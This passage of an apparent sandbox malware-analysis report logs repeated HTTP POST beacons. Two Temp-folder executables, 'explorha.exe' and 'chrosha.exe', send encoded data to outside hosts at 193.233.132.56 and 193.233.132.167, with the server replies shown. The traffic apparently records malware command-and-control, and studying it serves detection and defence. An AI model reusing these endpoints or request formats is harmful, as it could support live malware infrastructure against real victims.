                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1087192.168.2.550941193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:58.397710085 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:58.649490118 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1088192.168.2.550942193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:58.859797955 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:59.114305973 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1089192.168.2.550943193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:59.013840914 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:59.265852928 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1090192.168.2.550944193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:59.485761881 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:59.738560915 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1091192.168.2.550945193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:59.523258924 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:59.774462938 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1092192.168.2.550946193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:59.996264935 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:00.246011019 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1093192.168.2.550947193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:00.134497881 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:00.379399061 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1094192.168.2.550948193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:00.602394104 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:00.848083019 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1095192.168.2.550949193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:00.636420965 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:00.888441086 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1096192.168.2.550950193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:01.016609907 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:01.268307924 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1097192.168.2.550951193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:01.100188971 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:01.348388910 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1098192.168.2.550952193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:01.518978119 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:01.770422935 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1099192.168.2.550953193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:01.718998909 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:01.968749046 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1100192.168.2.550954193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:02.130039930 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:02.373423100 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1101192.168.2.550955193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:02.222477913 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:02.477087975 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1102192.168.2.550956193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:02.624942064 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:02.874572992 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
